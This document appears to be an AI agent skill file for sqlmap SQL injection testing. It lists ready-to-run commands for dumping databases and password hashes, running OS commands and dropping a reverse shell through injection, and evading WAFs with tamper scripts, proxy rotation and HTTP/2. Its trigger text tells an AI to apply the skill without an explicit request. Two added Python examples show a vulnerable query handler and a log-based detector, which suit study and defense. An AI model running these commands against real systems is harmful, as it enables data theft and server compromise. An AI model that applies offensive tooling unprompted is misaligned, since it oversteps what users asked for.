Hacktricks-skills sqlmap-pentest

SQL injection testing with sqlmap. Use this skill whenever the user needs to test for SQL injection vulnerabilities, enumerate databases, extract data from vulnerable applications, or bypass WAFs with sqlmap. Trigger on any mention of SQL injection testing, sqlmap commands, database enumeration, WAF bypass, or web application security testing involving SQL. Don't wait for explicit "use sqlmap" - if they're testing SQLi or need database extraction, this skill applies.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/sql-injection/sqlmap/SKILL.MD
source content

SQLMap Pentesting Skill

This skill helps you conduct SQL injection testing using sqlmap, from basic reconnaissance to advanced WAF bypass techniques.

Quick Start

Basic SQLMap Command Structure

sqlmap -u "<URL>" -p "<PARAMETER>" [OPTIONS]

Essential Flags for Most Tests

-u "<URL>"                    # Target URL
-p "<PARAM>"                  # Parameter to test
--random-agent                # Rotate user agents
--threads=10                  # Parallel requests
--risk=3                      # Aggressive testing (1-3; 3 is the maximum)
--level=5                     # Maximum detection (1-5)
--batch                       # Non-interactive mode
--technique="BEUSTQ"          # All injection techniques

Injection Techniques

Use --technique to specify which SQL injection methods to attempt:

Technique           | Flag | When to use
Boolean-based blind | B    | True/false conditions reveal data
Error-based         | E    | Verbose DBMS error messages
UNION query         | U    | UNION SELECT statements
Stacked queries     | S    | Multiple statements with semicolons
Time-based blind    | T    | SLEEP/WAITFOR delays
Out-of-band         | Q    | DNS callbacks, LOAD_FILE()

Default order: BEUSTQ

Example - Test only Boolean and Time-based:

sqlmap -u "http://target/?id=1" --technique="BT" --batch
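What the boolean-based (B) technique actually measures, as an added example that is not part of the original skill: a handler that concatenates the id parameter into its query answers a true and a false condition differently, while the parameterized handler (the fix) rejects the same input as a non-numeric id and returns nothing either way. The SQLite table, rows and function names are constructed for this demonstration.

```python
import sqlite3

# Constructed sample table for the demonstration.
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
_conn.executemany("INSERT INTO products VALUES (?, ?)",
                  [(1, "widget"), (2, "gadget"), (3, "gizmo")])

def lookup_vulnerable(product_id: str) -> list:
    """Concatenates the request parameter into SQL: the value becomes part of the query."""
    rows = _conn.execute("SELECT name FROM products WHERE id=" + product_id)
    return [row[0] for row in rows]

def lookup_safe(product_id: str) -> list:
    """Validates the type and binds the value, so it can only ever be data."""
    try:
        value = int(product_id)
    except ValueError:
        return []
    rows = _conn.execute("SELECT name FROM products WHERE id=?", (value,))
    return [row[0] for row in rows]

def answers_differ_for_true_and_false(lookup) -> bool:
    """The B technique's core observation: a true condition reproduces the
    baseline response and a false condition changes it. Only the concatenating
    handler behaves this way; the parameterized one returns [] for both."""
    baseline = lookup("1")
    return lookup("1 AND 1=1") == baseline and lookup("1 AND 1=2") != baseline
```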

Target Injection Points

URL Parameters (GET)

sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id  # '*' marks the injection point explicitly

POST Data

sqlmap -u "http://example.com" --data "username=*&password=*"

HTTP Headers

# Cookie injection
sqlmap -u "http://example.com" --cookie "mycookies=*"

# Header injection
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

From Burp/ZAP Capture

# Save request to req.txt, then:
sqlmap -r req.txt --current-user

Second-Order Injection

sqlmap -r request.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3

Database Enumeration

Internal Information

--current-user      # Current database user
--is-dba            # Check if user is admin
--hostname          # Server hostname
--users             # List database users
--passwords         # Extract user passwords

Database Data Extraction

--all               # Retrieve everything
--dbs               # List all databases
--tables            # List tables in database (-D <DB_NAME>)
--columns           # List columns in table (-D <DB> -T <TABLE>)
--dump              # Dump table contents

Example - Full enumeration:

sqlmap -u "http://target/?id=1" -p id --dbs --batch
sqlmap -u "http://target/?id=1" -p id -D "database_name" --tables --batch
sqlmap -u "http://target/?id=1" -p id -D "database_name" -T "users" --dump --batch

OS Command Execution

# Execute single command
sqlmap -u "http://target/?id=1" -p id --os-cmd "whoami"

# Interactive shell
sqlmap -u "http://target/?id=1" -p id --os-shell

# Drop reverse shell (requires Metasploit)
sqlmap -u "http://target/?id=1" -p id --os-pwn

WAF Bypass Techniques

Tamper Scripts

Use --tamper to bypass WAFs and filters. Common options:

Tamper               | Use case
apostrophemask.py    | Bypass quote filtering
base64encode.py      | Encode entire payload
chardoubleencode.py  | Double URL-encode
space2comment.py     | Replace spaces with comments
randomcase.py        | Randomize keyword case
unionalltounion.py   | UNION ALL → UNION
versionedkeywords.py | MySQL versioned comments
luanginxmore.py      | Crash Lua-Nginx WAFs (POST only)

Example - Multiple tampers:

sqlmap -u "http://target/?id=1" -p id --tamper=apostrophemask.py,randomcase.py --batch

Example - Lua-Nginx WAF bypass:

sqlmap --method=POST -u "http://target" --data "id=*" --tamper=luanginxmore.py --batch
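From the defender's side, the injection techniques table and the tamper list above describe exactly what a log review has to undo before matching. This added example (not part of the original skill) scans constructed access-log lines for sqlmap-style payloads after reversing double URL-encoding, random keyword case, comment-for-space substitution and MySQL versioned comments; the log lines, user-agent string and indicator names are constructed for the demonstration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (combined format); lines 2 and 3 carry payloads
# shaped like the double-encoding, random-case and comment tampers listed above.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /?id=1%2520AnD%2520SlEeP%25285%2529 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] "GET /?id=1%27%2F%2A%2A%2FuNiOn%2F%2A%2A%2F%2F%2A%2150000sElEcT%2A%2F%2F%2A%2A%2F1 HTTP/1.1" 500 0 "-" "sqlmap/1.9"
198.51.100.7 - - [01/Jan/2024:10:00:04 +0000] "GET /search?q=union+station HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')

# Matched against the normalized query string, so tamper variants collapse onto one pattern.
INDICATORS = {
    "union-select": re.compile(r"\bunion\b.*\bselect\b"),
    "time-delay": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b"),
    "boolean-condition": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+"),
    "stacked-query": re.compile(r";\s*(select|insert|update|delete|drop|exec)\b"),
    "load-file": re.compile(r"\bload_file\s*\("),
}

def normalize(raw: str) -> str:
    """Undo the obfuscations the tamper scripts apply before pattern matching."""
    s = raw
    for _ in range(2):                        # chardoubleencode: decode twice
        s = unquote_plus(s)
    s = re.sub(r"/\*!?\d*|\*/", " ", s)       # versionedkeywords and space2comment
    return re.sub(r"\s+", " ", s).strip().lower()   # randomcase: compare lower-cased

def classify(query: str, user_agent: str) -> list:
    """Names of every indicator that fires for one request."""
    norm = normalize(query)
    hits = [name for name, rx in INDICATORS.items() if rx.search(norm)]
    if user_agent.lower().startswith("sqlmap"):  # default UA unless --random-agent is set
        hits.append("sqlmap-user-agent")
    return hits

def scan_log(text: str) -> list:
    """Parse each line and report requests with at least one indicator."""
    findings = []
    for m in filter(None, map(LINE_RE.match, text.splitlines())):
        ip, _method, target, status, ua = m.groups()
        parts = urlsplit(target)
        hits = classify(parts.query, ua)
        if hits:
            findings.append({"ip": ip, "path": parts.path, "status": int(status), "indicators": hits})
    return findings
```

The benign "union station" search on the last line produces no finding, which is why the UNION pattern requires a following SELECT rather than the keyword alone.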

Custom Prefix/Suffix

# Add suffix to injection
sqlmap -u "http://target/?id=1" -p id --suffix="-- "

# Add prefix to injection
sqlmap -u "http://target/?id=1" -p id --prefix="') "

Boolean Blind Helper

# Find strings that don't appear in true responses
sqlmap -r request.txt -p id --not-string "ridiculous" --batch

Advanced Features

HTTP/2 Support (sqlmap >= 1.9.x)

# Force HTTP/2 (bypasses HTTP/1.1 rate limiting)
sqlmap -u "https://target" --http2 --force-ssl

Proxy Rotation

# Rotate proxies every 3 requests
sqlmap -u "http://target" --proxy-file proxies.txt --proxy-freq 3

Mobile User-Agent

# Spoof mobile client (some APIs expose more data)
sqlmap -u "http://target" --mobile

Offline Mode

# Reuse cached data without network traffic
sqlmap -u "http://target" --offline

# Purge session data when done
sqlmap -u "http://target" --purge

Website Crawling

# Auto-discover and test all endpoints
sqlmap -u "http://target/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

Authentication Support

# HTTP Basic Auth
sqlmap -u "http://target" --auth-type="Basic" --auth-cred="user:pass"

# HTTP Digest Auth
sqlmap -u "http://target" --auth-type="Digest" --auth-cred="user:pass"

# NTLM Auth
sqlmap -u "http://target" --auth-type="NTLM" --auth-cred="domain/user:pass"

Common Attack Scenarios

Scenario 1: Quick Vulnerability Check

sqlmap -u "http://target/?id=1" -p id --batch --random-agent --threads=10

Scenario 2: Full Database Extraction

sqlmap -u "http://target/?id=1" -p id --dbs --batch
sqlmap -u "http://target/?id=1" -p id -D "<db_name>" --tables --batch
sqlmap -u "http://target/?id=1" -p id -D "<db_name>" -T "<table_name>" --dump --batch

Scenario 3: WAF-Bypassed Enumeration

sqlmap -u "http://target/?id=1" -p id --tamper=apostrophemask.py,randomcase.py --level=5 --risk=3 --batch

Scenario 4: POST Request Testing

sqlmap -u "http://target/login" --data "username=*&password=*" --batch

Scenario 5: Header Injection

sqlmap -u "http://target" --headers="X-Forwarded-For:*" --batch

Safety and Ethics

  • Only test systems you have authorization to test
  • Use --risk=1 and --level=1 for initial reconnaissance
  • Higher risk/level values can cause database instability
  • Use --purge to clean up session data after testing
  • Document all findings for responsible disclosure

Troubleshooting

Slow Performance

  • Reduce the --threads value
  • Lower --level and --risk
  • Use --batch to skip interactive prompts

False Positives

  • Verify with manual testing
  • Use --technique to limit to specific methods
  • Check with --not-string for boolean blind

WAF Blocking

  • Try different tamper scripts
  • Use proxy rotation
  • Lower request rate with fewer threads
  • Try HTTP/2 with --http2

References